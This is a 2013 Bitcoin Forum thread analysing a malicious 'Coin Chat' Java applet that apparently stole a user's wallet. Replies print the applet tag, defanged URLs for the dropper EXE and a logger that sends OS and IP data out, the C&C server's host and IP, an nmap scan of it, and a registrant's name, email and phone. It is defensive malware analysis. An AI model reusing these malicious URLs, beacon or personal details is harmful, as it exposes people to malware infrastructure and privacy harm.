Bitcoin Forum
June 23, 2021, 03:50:13 AM *
News: Latest Bitcoin Core release: 0.21.1 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: deleted  (Read 3031 times)
vipes2010
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
April 19, 2013, 04:40:03 PM
Last edit: October 24, 2014, 09:35:07 PM by vipes2010
 #1

deleted
1624420213
Hero Member
*
Offline Offline

Posts: 1624420213

View Profile Personal Message (Offline)

Ignore
1624420213
Reply with quote  #2

1624420213
Report to moderator
1624420213
Hero Member
*
Offline Offline

Posts: 1624420213

View Profile Personal Message (Offline)

Ignore
1624420213
Reply with quote  #2

1624420213
Report to moderator
1624420213
Hero Member
*
Offline Offline

Posts: 1624420213

View Profile Personal Message (Offline)

Ignore
1624420213
Reply with quote  #2

1624420213
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1624420213
Hero Member
*
Offline Offline

Posts: 1624420213

View Profile Personal Message (Offline)

Ignore
1624420213
Reply with quote  #2

1624420213
Report to moderator
wumpus
Hero Member
*****
qt
Offline Offline

Activity: 812
Merit: 1000

No Maps for These Territories


View Profile
April 19, 2013, 05:17:10 PM
 #2

There are multiple possibilities:

- Weak passphrase

- He still had an unencrypted copy of the wallet around on his system

- An unencrypted copy of the wallet was still somewhere in the unallocated/deleted part of the file system (if the exploit scans the raw disk)

- He did type the wallet passphrase (and it got keylogged) but forgot about it

I'm sure that all problems with unencrypted keys staying behind in the wallet.dat are solved in 0.8.0 (in 0.6.0 already). When you encrypt, or upgrade from an older insecure version (versions 0.4.0 and 0.5.0rc), the wallet is re-written without any unencrypted keys remaining behind in the slack space of the database. Also, all keys that were in the wallet before encryption are marked so they will not be used anymore.

If you're really paranoid about "unencrypted keys staying behind in unallocated space in the file system", an additional security mechanism is to send all your coins to a receiving address that is generated after the wallet is encrypted.

Bitcoin Core developer [PGP] Warning: For most, coin loss is a larger risk than coin theft. A disk can die any time. Regularly back up your wallet through FileBackup Wallet to an external storage or the (encrypted!) cloud. Use a separate offline wallet for storing larger amounts.
Nicolai
Newbie
*
Offline Offline

Activity: 39
Merit: 0



View Profile
April 19, 2013, 06:30:10 PM
Last edit: April 19, 2013, 11:03:07 PM by Nicolai
 #3

The webpage with the exploit: hXXp://coinchat.freetzi.com/blank.html

Code:
<applet name='Coin Chat Client' width='900' height='450' code='wFidEABfB.class' archive='wFidEABfB.jar'></applet>

The .jar contains:

The malware: hXXp://fuskbugg.se/dl/f1adsy/smss2.exe (virustotal)
(I have sent the file to a lot of A/V vendors, so hopefully the detection rate will soon be better)

And badly obfuscated "logger":
Quote
hXXp://galaxyjdb.com/insert.php?&o= OS.name &u=thewinner1234&ip= IP &e= paramString
(could be some kind of pay-by-install ?)
paramString can be "Noa", "Noc", "Yes", "Nod"

(also "http" has been changed to "hXXp", just in case. NEVER click ANY of these links, unless you know what you're doing).

EDIT1:
The malware C&C server = service2012.no-ip.biz = 63.141.253.124 (port 91)

coinchat.freetzi.com = 69.162.82.249
fuskbugg.se = 88.80.2.12
galaxyjdb.com = 109.163.233.106

galaxyjdb.com is owned by:
Code:
Quick Ware
   Alex B (sblfc1234@gmail.com)
   +44.7543642587
   Fax: +1.5555555555
   8 does it matter road
   Liverpool, merseyside l17 7ja
   GB

EDIT2:
The .jar exploit contain:
Code:
k{ol~puuly89:
Coded By Orpheu
The Responsibility in the use of this is on the user not the coder
(Orpheu's skype = izroda6)

And the C&C server is most likely made using this tutorial: http://www.hackforums.net/showthread.php?tid=145184
Mike Hearn
Legendary
*
expert
Offline Offline

Activity: 1526
Merit: 1018


View Profile
April 19, 2013, 06:35:55 PM
 #4

As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions.
interfect
Full Member
***
Offline Offline

Activity: 141
Merit: 100


View Profile
April 20, 2013, 12:58:42 AM
 #5

Holy Nmap Batman!

Code:
$ nmap 63.141.253.124

Starting Nmap 6.00 ( http://nmap.org ) at 2013-04-19 17:58 PDT
Nmap scan report for 63.141.253.124
Host is up (0.11s latency).
Not shown: 973 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
25/tcp    filtered smtp
80/tcp    open     http
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
211/tcp   filtered 914c-g
445/tcp   filtered microsoft-ds
500/tcp   filtered isakmp
513/tcp   filtered login
666/tcp   filtered doom
1100/tcp  filtered mctp
1999/tcp  filtered tcp-id-port
2000/tcp  filtered cisco-sccp
2030/tcp  filtered device2
3006/tcp  filtered deslogind
3306/tcp  open     mysql
3814/tcp  filtered neto-dcs
5000/tcp  filtered upnp
6001/tcp  filtered X11:1
7938/tcp  filtered lgtomapper
8800/tcp  filtered sunwebadmin
8888/tcp  filtered sun-answerbook
9002/tcp  filtered dynamid
9290/tcp  filtered unknown
10215/tcp filtered unknown
40911/tcp filtered unknown
60020/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds

Nicolai
Newbie
*
Offline Offline

Activity: 39
Merit: 0



View Profile
April 20, 2013, 11:40:56 PM
 #6

Mike Hearn: You are right, it does not exploit any flaws in Java (just ask permission, download'n'run the malware).
K1773R
Legendary
*
Offline Offline

Activity: 1792
Merit: 1008


/dev/null


View Profile
April 21, 2013, 12:23:04 AM
 #7

As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions.
if someone provides the autoit binary, i decompile it Wink

[GPG Public Key]  [Devcoin Builds]  [BBQCoin Builds]  [Multichain Blockexplorer]  [Multichain Blockexplorer - PoS Coins]  [Ufasoft Miner Linux Builds]
BTC/DVC/TRC/FRC: 1K1773RbXRZVRQSSXe9N6N2MUFERvrdu6y ANC/XPM AK1773RTmRKtvbKBCrUu95UQg5iegrqyeA NMC: NK1773Rzv8b4ugmCgX789PbjewA9fL9Dy1 LTC: LKi773RBuPepQH8E6Zb1ponoCvgbU7hHmd EMC: EK1773RxUes1HX1YAGMZ1xVYBBRUCqfDoF BQC: bK1773R1APJz4yTgRkmdKQhjhiMyQpJgfN
K1773R
Legendary
*
Offline Offline

Activity: 1792
Merit: 1008


/dev/null


View Profile
April 22, 2013, 11:35:58 AM
 #8

unfortunately the code has been obfuscated, but you can still find out what it does it just takes more time to understand it Wink
if someone is interested in it, send me a message and il send it to you (without the binary of course!). i dont want to host this code since its malware!

[GPG Public Key]  [Devcoin Builds]  [BBQCoin Builds]  [Multichain Blockexplorer]  [Multichain Blockexplorer - PoS Coins]  [Ufasoft Miner Linux Builds]
BTC/DVC/TRC/FRC: 1K1773RbXRZVRQSSXe9N6N2MUFERvrdu6y ANC/XPM AK1773RTmRKtvbKBCrUu95UQg5iegrqyeA NMC: NK1773Rzv8b4ugmCgX789PbjewA9fL9Dy1 LTC: LKi773RBuPepQH8E6Zb1ponoCvgbU7hHmd EMC: EK1773RxUes1HX1YAGMZ1xVYBBRUCqfDoF BQC: bK1773R1APJz4yTgRkmdKQhjhiMyQpJgfN
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!